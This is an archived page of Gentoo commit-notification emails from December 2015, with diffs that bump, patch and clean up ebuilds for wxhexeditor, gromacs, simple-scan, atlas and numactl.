[gentoo-commits] repo/gentoo:master commit in: app-editors/wxhexeditor/, app-editors/wxhexeditor/files/

2015-12-14 Thread Ryan Hill
commit: 36f20e902afe189529639ba25fe6ccaccf31c6da
Author: Ryan Hill  gentoo  org>
AuthorDate: Mon Dec 14 23:35:33 2015 +
Commit: Ryan Hill  gentoo  org>
CommitDate: Mon Dec 14 23:35:33 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=36f20e90

app-editors/wxhexeditor: Version bump, bug #542790.

Package-Manager: portage-2.2.26
Signed-off-by: Ryan Hill  gentoo.org>

 app-editors/wxhexeditor/Manifest   |  1 +
 .../files/wxhexeditor-0.23-syslibs.patch   | 84 ++
 app-editors/wxhexeditor/wxhexeditor-0.23.ebuild| 46 
 3 files changed, 131 insertions(+)

diff --git a/app-editors/wxhexeditor/Manifest b/app-editors/wxhexeditor/Manifest
index bdecce4..a757244 100644
--- a/app-editors/wxhexeditor/Manifest
+++ b/app-editors/wxhexeditor/Manifest
@@ -1,3 +1,4 @@
 DIST wxHexEditor-v0.20-src.tar.bz2 1194554 SHA256 
a3dda32eb62e3ec1c9760519302bcef688253d48b3d2c566f9629c4e4246ae55 SHA512 
f8138fb892528fd7d131b0931f52cb6b19dc984aa831882d7f60f557527e6bb559429a11b5a1307cf51d1a8974123627d15ccee87561970784a75910929f85a3
 WHIRLPOOL 
9d3343060f815fae7b2512b098c3a1c4853c062040cb2b180bf7402231295d27e96a3996aca041ce2f694f2cc84bb6dfbc419797079713afb254900187d100e0
 DIST wxHexEditor-v0.21-src.tar.bz2 1760192 SHA256 
076111ebcf1472e80ec9a16223ca60bdf4598689cc5aa076a4f9760bba51f17f SHA512 
bea80a139bb76e47ed5d3644f923b4b042d8842bb3522e88e2c84947eadc7f49f2599438f583ea8a1fde05356886d8fb20f679398e1519c13acd8e4dd49ad729
 WHIRLPOOL 
fd5ebc1609183b8879254461c7eb1a22355a2f71ca45452a6dd21ca8164c5b8b96474d9d1c01b2aea962d4d47c291e3b43d8bf1d337c7bcff6c1c109c3fe29b9
 DIST wxHexEditor-v0.22-src.tar.bz2 2329754 SHA256 
3c04725d218d21807ee78ccdd4bc78d302b92139c92bbd0a0edc53f2d0003996 SHA512 
d846b30110bf2c864ec8dc45d1a4e9e333ec79379e335d7ecf5c8eed18a22bf2af26de1bcdca1977c94f2789a82c6eaf5fd2c2a91389f4c20f219a974c5e18ac
 WHIRLPOOL 
44988f4349bc78ce7dd975ce7332a72dc5176e3308a9837e0634cce55e029a758488ed1ff07fdcd1f8c64638b0bf86ea8b73cc4c8f7b7400384487eb6bbfea1d
+DIST wxHexEditor-v0.23-src.tar.bz2 2534659 SHA256 
24a5a8b8df3abfbc3836d07b379003b45ea0ab0d2d45cb9611c797c595f8972b SHA512 
abbd2338c2d0d7d514342f5c330ea42c9ee1f3489c4661426927f51c802a7806e4ee965fa5d467c7b928ba87395eb6c351ab5f43f18d5fce836adede5f1d6be4
 WHIRLPOOL 
808bc8694a89f1eadb1b2c772cd69c76c7e3aba82d793f94f75a6392de5009546c2ada78bd8513f551edfd878251056ace367d9bbfdb21cd5f0bea4899c30c9f

diff --git a/app-editors/wxhexeditor/files/wxhexeditor-0.23-syslibs.patch 
b/app-editors/wxhexeditor/files/wxhexeditor-0.23-syslibs.patch
new file mode 100644
index 000..341c63b
--- /dev/null
+++ b/app-editors/wxhexeditor/files/wxhexeditor-0.23-syslibs.patch
@@ -0,0 +1,84 @@
+Use system copies of mhash and udis86.
+Also pass -fopenmp when linking to avoid build errors.
+
+--- a/Makefile
 b/Makefile
+@@ -3,9 +3,9 @@ WXCONFIG = wx-config
+ #CXX ?= `$(WXCONFIG) --cxx`
+ CC = `$(WXCONFIG) --cc`
+ CXX = `$(WXCONFIG) --cxx`
+-LDFLAGS += -lgomp
++LDFLAGS += -fopenmp -lgomp
+ #add this ldflags for WinConsole  "-Wl,--subsystem,console -mconsole" for 
win-debug
+-WXCXXFLAGS= `$(WXCONFIG) --cxxflags` -Iudis86 -Imhash/include -MMD -fopenmp
++WXCXXFLAGS= `$(WXCONFIG) --cxxflags` -MMD -fopenmp
+ WXLDFLAGS = `$(WXCONFIG) --libs` `$(WXCONFIG) --libs aui` `$(WXCONFIG) --libs 
core`
+ RC = `$(WXCONFIG) --rescomp`
+ #RC = x86_64-w64-mingw32-windres --define WX_CPU_AMD64
+@@ -25,7 +25,7 @@ SOURCES= src/HexEditorGui.cpp \
+   src/HexEditorCtrl/wxHexCtrl/Tag.cpp\
+   src/HexEditorCtrl/HexEditorCtrlGui.cpp\
+   src/HexEditorFrame.cpp
+-LIBS = udis86/libudis86/.libs/libudis86.a mhash/lib/.libs/libmhash.a
++LIBS = -ludis86 -lmhash
+ OBJECTS=$(SOURCES:.cpp=.o)
+ DEPENDS=$(OBJECTS:.o=.d)
+ LANGUAGEDIRS=`ls -l ./locale | grep ^d | sed s/.*\ //g;`
+@@ -36,7 +36,7 @@ EXECUTABLE=wxHexEditor
+ EXECUTABLE_WIN=$(EXECUTABLE).exe
+ EXECUTABLE_DIR_MAC=$(EXECUTABLE).app
+ 
+-PREFIX  = /usr/local
++PREFIX  = /usr
+ BINDIR  = $(PREFIX)/bin
+ DATADIR = $(PREFIX)/share
+ LOCALEDIR   = $(DATADIR)/locale
+@@ -63,15 +63,6 @@ langs: $(MOBJECTS)
+ %.mo : %.po
+   $(MSGFMT) $< -o $@
+ 
+-udis86/libudis86/.libs/libudis86.a:
+-  cd udis86;./autogen.sh
+-  cd udis86;./configure --host=$(HOST) CFLAGS="$(CFLAGS)" 
CXXFLAGS="$(CXXFLAGS)" CPPFLAGS="$(CPPFLAGS)"
+-  cd udis86/libudis86; $(MAKE) $(MFLAGS)
+-
+-mhash/lib/.libs/libmhash.a:
+-  cd mhash; ./configure --host=$(HOST) CFLAGS="$(CFLAGS)" 
CXXFLAGS="$(CXXFLAGS)" CPPFLAGS="$(CPPFLAGS)"
+-  cd mhash; $(MAKE) $(MFLAGS)
+-
+ win: $(RESOURCES) $(EXECUTABLE_WIN)
+ 
+ #Stack override required for file comparison function...
+--- a/src/HexDialogs.cpp
 b/src/HexDialogs.cpp
+@@ -24,7 +24,7 @@
+ #define NANINT 0xLL
+ #include "HexDialogs.h"
+ #include 
+-#include "../mhash/include/mhash.h"
++#include 
+ 
+ #ifdef _OPENMP_
+#include 
+--- a/src/HexEditor.h
 b/src/HexEditor.h
+@@ -25,7 

[gentoo-commits] proj/sci:master commit in: sci-chemistry/gromacs/

2015-12-14 Thread Christoph Junghans
commit: 98e18f884c5eb090079fa831504e2859c7023300
Author: Christoph Junghans  gentoo  org>
AuthorDate: Tue Dec 15 00:24:28 2015 +
Commit: Christoph Junghans  gentoo  org>
CommitDate: Tue Dec 15 00:24:28 2015 +
URL:https://gitweb.gentoo.org/proj/sci.git/commit/?id=98e18f88

sci-chemistry/gromacs: merge change from 5.1.

Package-Manager: portage-2.2.25

 sci-chemistry/gromacs/ChangeLog   |  3 +++
 sci-chemistry/gromacs/gromacs-.ebuild | 42 ++-
 2 files changed, 28 insertions(+), 17 deletions(-)

diff --git a/sci-chemistry/gromacs/ChangeLog b/sci-chemistry/gromacs/ChangeLog
index 5248d93..2caa2a8 100644
--- a/sci-chemistry/gromacs/ChangeLog
+++ b/sci-chemistry/gromacs/ChangeLog
@@ -2,6 +2,9 @@
 # Copyright 1999-2015 Gentoo Foundation; Distributed under the GPL v2
 # $Id$
 
+  15 Dec 2015; Christoph Junghans  gromacs-.ebuild:
+  sci-chemistry/gromacs: merge change from 5.1.
+
 *gromacs-5.1. (20 Aug 2015)
 
   20 Aug 2015; Christoph Junghans  +gromacs-5.1..ebuild:

diff --git a/sci-chemistry/gromacs/gromacs-.ebuild 
b/sci-chemistry/gromacs/gromacs-.ebuild
index 933074f..031dfca 100644
--- a/sci-chemistry/gromacs/gromacs-.ebuild
+++ b/sci-chemistry/gromacs/gromacs-.ebuild
@@ -4,8 +4,6 @@
 
 EAPI=5
 
-TEST_PV="5.0-rc1"
-
 CMAKE_MAKEFILE_GENERATOR="ninja"
 
 inherit bash-completion-r1 cmake-utils cuda eutils multilib readme.gentoo 
toolchain-funcs
@@ -15,11 +13,13 @@ if [[ $PV = ** ]]; then
https://gerrit.gromacs.org/gromacs.git
git://github.com/gromacs/gromacs.git
http://repo.or.cz/r/gromacs.git;
-   EGIT_BRANCH="master"
+   [[ $PV =  ]] && EGIT_BRANCH="master" || 
EGIT_BRANCH="release-${PV:0:1}-${PV:2:1}"
inherit git-r3
+   KEYWORDS=""
 else
SRC_URI="ftp://ftp.gromacs.org/pub/${PN}/${PN}-${PV/_/-}.tar.gz
-   test? ( 
http://gerrit.gromacs.org/download/regressiontests-${TEST_PV}.tar.gz )"
+   test? ( 
http://gerrit.gromacs.org/download/regressiontests-${PV}.tar.gz )"
+   KEYWORDS="~alpha ~amd64 ~arm ~ppc64 ~sparc ~x86 ~amd64-linux ~x86-linux 
~x64-macos ~x86-macos"
 fi
 
 ACCE_IUSE="cpu_flags_x86_sse2 cpu_flags_x86_sse4_1 cpu_flags_x86_fma4 
cpu_flags_x86_avx cpu_flags_x86_avx2"
@@ -32,8 +32,7 @@ HOMEPAGE="http://www.gromacs.org/;
 #base,vmd plugins, fftpack from numpy,  blas/lapck from netlib,
memtestG80 library,  mpi_thread lib
 LICENSE="LGPL-2.1 UoI-NCSA !mkl? ( !fftw? ( BSD ) !blas? ( BSD ) !lapack? ( 
BSD ) ) cuda? ( LGPL-3 ) threads? ( BSD )"
 SLOT="0/${PV}"
-KEYWORDS=""
-IUSE="X blas boost cuda +doc -double-precision +fftw lapack +make-symlinks mkl 
mpi +offensive openmp +single-precision test +threads +tng ${ACCE_IUSE}"
+IUSE="X blas boost cuda +doc -double-precision +fftw lapack mkl mpi +offensive 
openmp +single-precision test +threads +tng ${ACCE_IUSE}"
 
 CDEPEND="
X? (
@@ -83,8 +82,8 @@ src_unpack() {
git-r3_src_unpack
if use test; then

EGIT_REPO_URI="git://git.gromacs.org/regressiontests.git" \
-   EGIT_BRANCH="master" EGIT_NOUNPACK="yes" 
EGIT_COMMIT="master" \
-   EGIT_SOURCEDIR="${WORKDIR}/regressiontests"\
+   EGIT_BRANCH="${EGIT_BRANCH}" \
+   EGIT_CHECKOUT_DIR="${WORKDIR}/regressiontests"\
git-r3_src_unpack
fi
fi
@@ -154,7 +153,6 @@ src_configure() {
$(cmake-utils_use boost GMX_EXTERNAL_BOOST)
$(cmake-utils_use tng GMX_USE_TNG)
$(cmake-utils_use doc GMX_BUILD_MANUAL)
-   $(cmake-utils_use make-symlinks GMX_SYMLINK_OLD_BINARY_NAMES)
-DGMX_DEFAULT_SUFFIX=off
-DGMX_SIMD="$acce"
-DGMX_LIB_INSTALL_DIR="$(get_libdir)"
@@ -188,6 +186,8 @@ src_configure() {
-DGMX_LIBS_SUFFIX="${suffix}"
)
BUILD_DIR="${WORKDIR}/${P}_${x}" cmake-utils_src_configure
+   [[ ${CHOST} != *-darwin* ]] || \
+ sed -i '/SET(CMAKE_INSTALL_NAME_DIR/s/^/#/' 
"${WORKDIR}/${P}_${x}/gentoo_rules.cmake" || die
use mpi || continue
einfo "Configuring for ${x} precision with mpi"
mycmakeargs=(
@@ -202,6 +202,8 @@ src_configure() {
-DGMX_LIBS_SUFFIX="_mpi${suffix}"
)
BUILD_DIR="${WORKDIR}/${P}_${x}_mpi" CC="mpicc" 
cmake-utils_src_configure
+   [[ ${CHOST} != *-darwin* ]] || \
+ sed -i '/SET(CMAKE_INSTALL_NAME_DIR/s/^/#/' 
"${WORKDIR}/${P}_${x}_mpi/gentoo_rules.cmake" || die
done
 }
 
@@ -210,9 +212,7 @@ src_compile() {
einfo "Compiling for ${x} precision"
BUILD_DIR="${WORKDIR}/${P}_${x}"\
   

[gentoo-commits] repo/gentoo:master commit in: app-editors/wxhexeditor/files/, app-editors/wxhexeditor/

2015-12-14 Thread Ryan Hill
commit: 268cc759a217c912551369dc6189982b4afa008d
Author: Ryan Hill  gentoo  org>
AuthorDate: Mon Dec 14 23:38:03 2015 +
Commit: Ryan Hill  gentoo  org>
CommitDate: Mon Dec 14 23:38:03 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=268cc759

app-editors/wxhexeditor: Remove old.

Package-Manager: portage-2.2.26
Signed-off-by: Ryan Hill  gentoo.org>

 app-editors/wxhexeditor/Manifest   |   2 -
 .../files/wxhexeditor-0.20-makefile.patch  | 108 -
 .../wxhexeditor-0.21-desktop-validation.patch  |  17 
 .../files/wxhexeditor-0.21-makefile.patch  | 107 
 app-editors/wxhexeditor/wxhexeditor-0.20.ebuild|  35 ---
 app-editors/wxhexeditor/wxhexeditor-0.21.ebuild|  38 
 6 files changed, 307 deletions(-)

diff --git a/app-editors/wxhexeditor/Manifest b/app-editors/wxhexeditor/Manifest
index a757244..692e74d 100644
--- a/app-editors/wxhexeditor/Manifest
+++ b/app-editors/wxhexeditor/Manifest
@@ -1,4 +1,2 @@
-DIST wxHexEditor-v0.20-src.tar.bz2 1194554 SHA256 
a3dda32eb62e3ec1c9760519302bcef688253d48b3d2c566f9629c4e4246ae55 SHA512 
f8138fb892528fd7d131b0931f52cb6b19dc984aa831882d7f60f557527e6bb559429a11b5a1307cf51d1a8974123627d15ccee87561970784a75910929f85a3
 WHIRLPOOL 
9d3343060f815fae7b2512b098c3a1c4853c062040cb2b180bf7402231295d27e96a3996aca041ce2f694f2cc84bb6dfbc419797079713afb254900187d100e0
-DIST wxHexEditor-v0.21-src.tar.bz2 1760192 SHA256 
076111ebcf1472e80ec9a16223ca60bdf4598689cc5aa076a4f9760bba51f17f SHA512 
bea80a139bb76e47ed5d3644f923b4b042d8842bb3522e88e2c84947eadc7f49f2599438f583ea8a1fde05356886d8fb20f679398e1519c13acd8e4dd49ad729
 WHIRLPOOL 
fd5ebc1609183b8879254461c7eb1a22355a2f71ca45452a6dd21ca8164c5b8b96474d9d1c01b2aea962d4d47c291e3b43d8bf1d337c7bcff6c1c109c3fe29b9
 DIST wxHexEditor-v0.22-src.tar.bz2 2329754 SHA256 
3c04725d218d21807ee78ccdd4bc78d302b92139c92bbd0a0edc53f2d0003996 SHA512 
d846b30110bf2c864ec8dc45d1a4e9e333ec79379e335d7ecf5c8eed18a22bf2af26de1bcdca1977c94f2789a82c6eaf5fd2c2a91389f4c20f219a974c5e18ac
 WHIRLPOOL 
44988f4349bc78ce7dd975ce7332a72dc5176e3308a9837e0634cce55e029a758488ed1ff07fdcd1f8c64638b0bf86ea8b73cc4c8f7b7400384487eb6bbfea1d
 DIST wxHexEditor-v0.23-src.tar.bz2 2534659 SHA256 
24a5a8b8df3abfbc3836d07b379003b45ea0ab0d2d45cb9611c797c595f8972b SHA512 
abbd2338c2d0d7d514342f5c330ea42c9ee1f3489c4661426927f51c802a7806e4ee965fa5d467c7b928ba87395eb6c351ab5f43f18d5fce836adede5f1d6be4
 WHIRLPOOL 
808bc8694a89f1eadb1b2c772cd69c76c7e3aba82d793f94f75a6392de5009546c2ada78bd8513f551edfd878251056ace367d9bbfdb21cd5f0bea4899c30c9f

diff --git a/app-editors/wxhexeditor/files/wxhexeditor-0.20-makefile.patch 
b/app-editors/wxhexeditor/files/wxhexeditor-0.20-makefile.patch
deleted file mode 100644
index b4d97b2..000
--- a/app-editors/wxhexeditor/files/wxhexeditor-0.20-makefile.patch
+++ /dev/null
@@ -1,108 +0,0 @@
 a/makefile
-+++ b/makefile
-@@ -1,8 +1,8 @@
- WXCONFIG = wx-config
- CC = `$(WXCONFIG) --cc`
- CPP = `$(WXCONFIG) --cxx`
--CXXFLAGS= `$(WXCONFIG) --cxxflags` -Iudis86 -Imhash/include -MMD -O2 -c 
${OPTFLAGS}
--LDFLAGS = `$(WXCONFIG) --libs`
-+WXCXXFLAGS= `$(WXCONFIG) --cxxflags` -MMD -c ${OPTFLAGS} -fopenmp ${CXXFLAGS}
-+WXLDFLAGS = `$(WXCONFIG) --libs` -fopenmp ${LDFLAGS}
- RC = `$(WXCONFIG) --rescomp`
- #RC = x86_64-w64-mingw32-windres --define WX_CPU_AMD64
- RCFLAGS = `$(WXCONFIG) --cxxflags | sed s/' '-m.*//g;`
-@@ -19,7 +19,7 @@ SOURCES= src/HexEditorGui.cpp \
-   src/HexEditorCtrl/wxHexCtrl/Tag.cpp\
-   src/HexEditorCtrl/HexEditorCtrlGui.cpp\
-   src/HexEditorFrame.cpp
--LIBS = udis86/libudis86/.libs/libudis86.a mhash/lib/.libs/libmhash.a
-+LIBS = -lmhash -ludis86
- OBJECTS=$(SOURCES:.cpp=.o)
- DEPENDS=$(OBJECTS:.o=.d)
- RESOURCES= resources/resource.rc
-@@ -28,43 +28,35 @@ EXECUTABLE=wxHexEditor
- EXECUTABLE_WIN=$(EXECUTABLE).exe
- EXECUTABLE_DIR_MAC=$(EXECUTABLE).app
- 
--PREFIX  = /usr/local
-+DESTDIR =
-+PREFIX  = $(DESTDIR)/usr
- BINDIR  = $(PREFIX)/bin
- DATADIR = $(PREFIX)/share
- LOCALEDIR   = $(DATADIR)/locale
- 
--VERSION = 0.12 Beta
-+VERSION = 0.20
- 
- all: $(EXECUTABLE)
- 
--$(OBJECTS): $(LIBS) $(SOURCES)
-+$(OBJECTS): $(SOURCES)
- 
- $(EXECUTABLE): $(OBJECTS)
--  $(CPP) $(OBJECTS) $(LIBS) $(LDFLAGS) -lgomp -o $@
-+  $(CPP) $(OBJECTS) $(LIBS) $(WXLDFLAGS) ${CXXFLAGS} -o $@
- 
--.cpp.o: $(LIBS)
--  $(CPP) $(CXXFLAGS) $< -o $@
-+.cpp.o:
-+  $(CPP) $(WXCXXFLAGS) $< -o $@
- 
- %.o : %.rc
-   $(RC) $(RCFLAGS) $< -o $@
- 
--udis86/libudis86/.libs/libudis86.a:
--  cd udis86;./autogen.sh
--  cd udis86;./configure --host=$(HOST)
--  cd udis86/libudis86; $(MAKE) $(MFLAGS)
--
--mhash/lib/.libs/libmhash.a:
--  cd mhash; ./configure --host=$(HOST)
--  cd mhash; $(MAKE) $(MFLAGS)
--
- win: $(RESOURCES) $(EXECUTABLE_WIN)
- 
- #Stack override required for file comparison function...
- $(EXECUTABLE_WIN): $(OBJECTS) 

[gentoo-commits] repo/gentoo:master commit in: media-gfx/simple-scan/

2015-12-14 Thread Gilles Dartiguelongue
commit: 96441a8f92489e16acfd568a5517d14456712f37
Author: Gilles Dartiguelongue  gentoo  org>
AuthorDate: Mon Dec 14 23:38:43 2015 +
Commit: Gilles Dartiguelongue  gentoo  org>
CommitDate: Mon Dec 14 23:39:35 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=96441a8f

media-gfx/simple-scan: add missing USE-dependency on libgusb, bug #568066

Package-Manager: portage-2.2.26

 media-gfx/simple-scan/simple-scan-3.18.2.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/media-gfx/simple-scan/simple-scan-3.18.2.ebuild 
b/media-gfx/simple-scan/simple-scan-3.18.2.ebuild
index 113fe00..a60ff94 100644
--- a/media-gfx/simple-scan/simple-scan-3.18.2.ebuild
+++ b/media-gfx/simple-scan/simple-scan-3.18.2.ebuild
@@ -21,7 +21,7 @@ IUSE="colord"
 
 COMMON_DEPEND="
>=dev-libs/glib-2.32:2
-   dev-libs/libgusb
+   dev-libs/libgusb[vala]
>=media-gfx/sane-backends-1.0.20:=
>=sys-libs/zlib-1.2.3.1:=
virtual/jpeg:0=



[gentoo-commits] proj/sci:master commit in: sci-libs/atlas/

2015-12-14 Thread Justin Lecher
commit: 6ff188a81f27d09a7a6eb304d91afc3a5caea7d4
Author: Justin Lecher  gentoo  org>
AuthorDate: Mon Dec 14 11:39:34 2015 +
Commit: Justin Lecher  gentoo  org>
CommitDate: Mon Dec 14 11:39:34 2015 +
URL:https://gitweb.gentoo.org/proj/sci.git/commit/?id=6ff188a8

sci-libs/atlas: Warn if incompatible kernel config is set

Gentoo-Bug: https://bugs.gentoo.org/show_bug.cgi?id=567682

Package-Manager: portage-2.2.26
Signed-off-by: Justin Lecher  gentoo.org>

 sci-libs/atlas/atlas-3.11.38-r1.ebuild | 9 -
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/sci-libs/atlas/atlas-3.11.38-r1.ebuild 
b/sci-libs/atlas/atlas-3.11.38-r1.ebuild
index 3c760fe..8af1506 100644
--- a/sci-libs/atlas/atlas-3.11.38-r1.ebuild
+++ b/sci-libs/atlas/atlas-3.11.38-r1.ebuild
@@ -6,7 +6,7 @@ EAPI=5
 
 FORTRAN_NEEDED=fortran
 
-inherit alternatives-2 eutils fortran-2 multilib numeric toolchain-funcs 
versionator
+inherit alternatives-2 eutils fortran-2 linux-info multilib numeric 
toolchain-funcs versionator
 
 LAPACKP=lapack-3.6.0.tgz
 
@@ -39,6 +39,13 @@ pkg_setup() {
[[ -e /sys/devices/system/cpu/intel_pstate ]] \
&& die "Intel P-State driver detected. Please reboot with 
'intel_pstate=disable' in your cmdline"
use fortran && fortran-2_pkg_setup
+   CONFIG_CHECK="
+   !~X86_P4_CLOCKMOD
+   !~X86_INTEL_PSTATE
+   "
+   ERROR_KERNEL_X86_P4_CLOCKMOD="P4 Clockmod frequency scaling influences 
tuning and needs to be disabled at compile time."
+   ERROR_KERNEL_X86_INTEL_PSTATE="Intel Pstate frequency scaling 
influences tuning and needs to be disabled at compile time."
+   linux-info_pkg_setup
 }
 
 src_configure() {



[gentoo-commits] repo/gentoo:master commit in: sys-process/numactl/

2015-12-14 Thread Lars Wendler
commit: 38c382517c7fe04cb4ae32ddf439b9831ecdb5a1
Author: Lars Wendler  gentoo  org>
AuthorDate: Mon Dec 14 10:01:04 2015 +
Commit: Lars Wendler  gentoo  org>
CommitDate: Mon Dec 14 10:02:16 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=38c38251

sys-process/numactl: Bump to version 2.0.11

Package-Manager: portage-2.2.26
Signed-off-by: Lars Wendler  gentoo.org>

 sys-process/numactl/Manifest  |  1 +
 sys-process/numactl/numactl-2.0.11.ebuild | 54 +++
 2 files changed, 55 insertions(+)

diff --git a/sys-process/numactl/Manifest b/sys-process/numactl/Manifest
index 31ce1c7..d67dfad 100644
--- a/sys-process/numactl/Manifest
+++ b/sys-process/numactl/Manifest
@@ -1,2 +1,3 @@
 DIST numactl-2.0.10.tar.gz 98999 SHA256 
9d197fefac81c73dc2b2e554f1758b2ec56d4e9b2f04a7f45dff5d6cb14fb9ce SHA512 
3a82b28bbc724a2340950ac33396055da852ee06e5b1d3414cd83dd6f9e26fbb648faae35ce4009c76d6a180f3067a8f3fb18e3ffaa6b6db68adfc0877e94975
 WHIRLPOOL 
59a172c14d96b01b1e13d2913f6f820d4f9bacb2f80e2920d4350273ff01ab57d56ab4a163fde2df3898c4b7cf204bd4a333c99f9feb9d5bcd89fea799a3d2db
+DIST numactl-2.0.11.tar.gz 408175 SHA256 
450c091235f891ee874a8651b179c30f57a1391ca5c4673354740ba65e527861 SHA512 
1969d7ee0ff3de0d6f1fa42ec089a17cdb3f92cb35d453b8f8b2eec49724c43787ecbd213357013a8f2500a260b0df9844d515815ca3a0376314a0eed050a0d4
 WHIRLPOOL 
2d22a54de00bea80835e206704652d4fead1b585b3bedd4eeb4b61d96514117e91a9c8bda466bd7f8d17e3777c4e7a8d69dd0a6e5b6ab29c0141e086c09c311b
 DIST numactl-2.0.9.tar.gz 341455 SHA256 
9ca033e6c14c0f26c20379b0cf9299429fd5a354a79c3c7880fd41ef69f7751c SHA512 
483cbb1607da0f3bf0923202ea565100ea430b19502bdbd322f043f75dc945cc0f47878c0ed28badab23561c37da0b04aa12d07656bb4666c4f8d02a0d256407
 WHIRLPOOL 
5aba5b4a6ab0a4f06a2266054fdc7be8ca81696cf417e4fa4d10667ab95195edc5e002551a3bda4ea1eb25caf01d171ed18a16e4c29960902546aa78d7b93d73

diff --git a/sys-process/numactl/numactl-2.0.11.ebuild 
b/sys-process/numactl/numactl-2.0.11.ebuild
new file mode 100644
index 000..c595624
--- /dev/null
+++ b/sys-process/numactl/numactl-2.0.11.ebuild
@@ -0,0 +1,54 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+inherit autotools eutils toolchain-funcs multilib-minimal
+
+DESCRIPTION="Utilities and libraries for NUMA systems"
+HOMEPAGE="http://oss.sgi.com/projects/libnuma/;
+SRC_URI="ftp://oss.sgi.com/www/projects/libnuma/download/${P}.tar.gz;
+
+LICENSE="GPL-2"
+SLOT="0"
+# ARM lacks the __NR_migrate_pages syscall.
+KEYWORDS="~amd64 -arm ~ia64 ~mips ~ppc ~ppc64 ~x86 ~amd64-linux"
+IUSE=""
+
+ECONF_SOURCE=${S}
+
+src_prepare() {
+   epatch "${FILESDIR}"/${PN}-2.0.8-cpuid-pic.patch #456238
+   epatch "${FILESDIR}"/${PN}-2.0.10-numademo-cflags.patch #540856
+   eautoreconf
+   # We need to copy the sources or else tests will fail
+   multilib_copy_sources
+}
+
+multilib_src_test() {
+   if multilib_is_native_abi ; then
+   if [ -d /sys/devices/system/node ]; then
+   einfo "The only generically safe test is regress2."
+   einfo "The other test cases require 2 NUMA nodes."
+   emake regress2
+   else
+   ewarn "You do not have baseline NUMA support in your 
kernel, skipping tests."
+   fi
+   fi
+}
+
+multilib_src_compile() {
+   multilib_is_native_abi && default || emake libnuma.la
+}
+
+multilib_src_install() {
+   emake DESTDIR="${D}" install$(multilib_is_native_abi || echo 
"-libLTLIBRARIES install-includeHEADERS")
+}
+
+multilib_src_install_all() {
+   DOCS=( README TODO CHANGES DESIGN )
+   einstalldocs
+   # delete man pages provided by the man-pages package #238805
+   rm -r "${ED}"/usr/share/man/man[25] || die
+}



[gentoo-commits] repo/gentoo:master commit in: sys-process/numactl/

2015-12-14 Thread Lars Wendler
commit: 22612ba7a92acfa2fc3d059299e752239103161e
Author: Lars Wendler  gentoo  org>
AuthorDate: Mon Dec 14 10:01:53 2015 +
Commit: Lars Wendler  gentoo  org>
CommitDate: Mon Dec 14 10:02:19 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=22612ba7

sys-process/numactl: Removed old.

Package-Manager: portage-2.2.26
Signed-off-by: Lars Wendler  gentoo.org>

 sys-process/numactl/numactl-2.0.10-r1.ebuild | 49 
 sys-process/numactl/numactl-2.0.10.ebuild| 39 --
 2 files changed, 88 deletions(-)

diff --git a/sys-process/numactl/numactl-2.0.10-r1.ebuild 
b/sys-process/numactl/numactl-2.0.10-r1.ebuild
deleted file mode 100644
index d01149b..000
--- a/sys-process/numactl/numactl-2.0.10-r1.ebuild
+++ /dev/null
@@ -1,49 +0,0 @@
-# Copyright 1999-2015 Gentoo Foundation
-# Distributed under the terms of the GNU General Public License v2
-# $Id$
-
-EAPI=5
-
-inherit autotools eutils toolchain-funcs multilib-minimal
-
-DESCRIPTION="Utilities and libraries for NUMA systems"
-HOMEPAGE="http://oss.sgi.com/projects/libnuma/;
-SRC_URI="ftp://oss.sgi.com/www/projects/libnuma/download/${P}.tar.gz;
-
-LICENSE="GPL-2"
-SLOT="0"
-# ARM lacks the __NR_migrate_pages syscall.
-KEYWORDS="~amd64 -arm ~ia64 ~ppc ~ppc64 ~x86 ~amd64-linux"
-IUSE=""
-
-ECONF_SOURCE=${S}
-
-src_prepare() {
-   eautoreconf
-   epatch "${FILESDIR}"/${PN}-2.0.8-cpuid-pic.patch #456238
-}
-
-src_test() {
-   if [ -d /sys/devices/system/node ]; then
-   einfo "The only generically safe test is regress2."
-   einfo "The other test cases require 2 NUMA nodes."
-   emake regress2
-   else
-   ewarn "You do not have baseline NUMA support in your kernel, 
skipping tests."
-   fi
-}
-
-multilib_src_compile() {
-   multilib_is_native_abi && default || emake libnuma.la
-}
-
-multilib_src_install() {
-   emake DESTDIR="${D}" install$(multilib_is_native_abi || echo 
"-libLTLIBRARIES install-includeHEADERS")
-}
-
-multilib_src_install_all() {
-   DOCS=( README TODO CHANGES DESIGN )
-   einstalldocs
-   # delete man pages provided by the man-pages package #238805
-   rm -r "${ED}"/usr/share/man/man[25] || die
-}

diff --git a/sys-process/numactl/numactl-2.0.10.ebuild 
b/sys-process/numactl/numactl-2.0.10.ebuild
deleted file mode 100644
index 395a453..000
--- a/sys-process/numactl/numactl-2.0.10.ebuild
+++ /dev/null
@@ -1,39 +0,0 @@
-# Copyright 1999-2014 Gentoo Foundation
-# Distributed under the terms of the GNU General Public License v2
-# $Id$
-
-EAPI=5
-
-inherit autotools eutils toolchain-funcs multilib
-
-DESCRIPTION="Utilities and libraries for NUMA systems"
-HOMEPAGE="http://oss.sgi.com/projects/libnuma/;
-SRC_URI="ftp://oss.sgi.com/www/projects/libnuma/download/${P}.tar.gz;
-
-LICENSE="GPL-2"
-SLOT="0"
-# ARM lacks the __NR_migrate_pages syscall.
-KEYWORDS="~amd64 -arm ~ia64 ~ppc ~ppc64 ~x86 ~amd64-linux"
-IUSE=""
-
-src_prepare() {
-   eautoreconf
-   epatch "${FILESDIR}"/${PN}-2.0.8-cpuid-pic.patch #456238
-}
-
-src_test() {
-   if [ -d /sys/devices/system/node ]; then
-   einfo "The only generically safe test is regress2."
-   einfo "The other test cases require 2 NUMA nodes."
-   emake regress2
-   else
-   ewarn "You do not have baseline NUMA support in your kernel, 
skipping tests."
-   fi
-}
-
-src_install() {
-   DOCS=( README TODO CHANGES DESIGN )
-   default
-   # delete man pages provided by the man-pages package #238805
-   rm -r "${ED}"/usr/share/man/man[25] || die
-}



[gentoo-commits] repo/gentoo:master commit in: app-text/docbook-xsl-stylesheets/

2015-12-14 Thread Lars Wendler
